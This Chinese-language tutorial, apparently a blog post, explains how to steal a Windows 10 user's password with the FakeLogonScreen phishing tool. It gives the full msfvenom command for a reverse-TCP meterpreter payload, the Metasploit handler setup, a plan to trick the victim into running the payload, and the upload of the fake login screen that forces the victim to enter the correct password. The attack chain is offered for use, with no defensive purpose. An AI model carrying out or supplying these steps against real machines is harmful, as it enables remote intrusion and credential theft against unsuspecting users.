使用FakeLogonScreen：轻松获取Windows 10密码

在先前的讨论中，我们提到了利用Mimikatz和Kiwi获取Windows明文密码的方法。然而，这种方式只适用于Windows 7系统。在更高版本的Windows 10和11中，该方法已失效。本文将介绍利用FakeLogonScreen和破解Windows 10密码的方法。

关于FakeLogonScreen

FakeLogonScreen是一种钓鱼工具，可以在目标Windows 10计算机的屏幕上创建虚假的登录页面。当受害者输入密码后，该密码将传递给攻击者。与其他钓鱼工具不同的是，只有用户输入了正确的密码，才能进入系统。

攻击思路

1. 利用Metasploit生成shell，诱使用户点击并获取相应的shell。
2. 上传FakeLogonScreen文件。当文件运行后，即可诱使用户输入密码。

接下来，我们下载FakeLogonScreen文件：项目地址https://github.com/bitsadmin/fakelogonscreen/releases。

然后利用Metasploit生成shell：

bash复制msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.123 lport=4444 -f exe >> payload.exe

接下来配置Metasploit终端：

bash复制use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.50.123 set lport 4444 run

当目标运行shell后，我们成功得到回弹。接着将之前下载的FakeLogonScreen文件上传到目标主机：

bash复制upload /root/Downloads/FakeLogonScreen.exe

完成后，访问shell并运行FakeLogonScreen.exe。

此时在目标计算机上，所有正在运行的窗口都将关闭，并且会出现一个登录屏幕，要求提供凭据。

为了测试这个工具的可靠性，我们输入错误的密码。它会显示“密码错误，请重试”。这正是FakeLogonScreen工具的强大之处，它强制目标输入正确的密码，用户别无选择，只能输入正确的密码。

需要注意的是，FakeLogonScreen与Metasploit的配合非常好，输入的密码信息我们可以直接在Metasploit的终端中查看！